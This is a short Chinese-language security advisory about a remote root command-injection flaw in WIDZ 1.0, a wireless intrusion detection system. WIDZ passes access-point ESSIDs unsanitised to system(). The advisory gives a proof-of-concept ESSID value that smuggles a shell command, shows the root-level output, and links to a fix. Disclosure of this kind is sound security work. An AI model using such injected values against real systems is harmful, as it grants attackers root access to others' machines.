WIDZ远程ROOT访问漏洞发布时间:2003-09-01 更新时间:2003-09-01 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:8479 受影响系统 WIDZ WIDZ 1.0详细描述 WIDZ是无线入侵检测系统。 WIDZ在监视访问接入点时,会查找AP与配置文件中的授权列表AP进行比较,如果AP不存在授权列表就会进行警告,但是由于通过不安全函数system()调用不安全的AP essid,如果提供恶意的AP接入点名,可导致以ROOT权限在WIDZ上执行任意命令。 测试代码 Go to Apple Airport and set network name to ';/usr/bin/id; 会出现如下信息: unknown AP essid= uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh: -c: line 3: unexpected EOF while looking for matching `'' sh: -c: line 4: syntax error: unexpected end of file 解决方案 最新版本的WIDZ已经修正这个漏洞: http://www.loud-fat-bloke.co.uk/w80211.html 相关信息 KF <dotslash@snosoft.com>. 参考:http://marc.theaimsgroup.com/?l=bugtraq&m=106194403521038&w=2 |
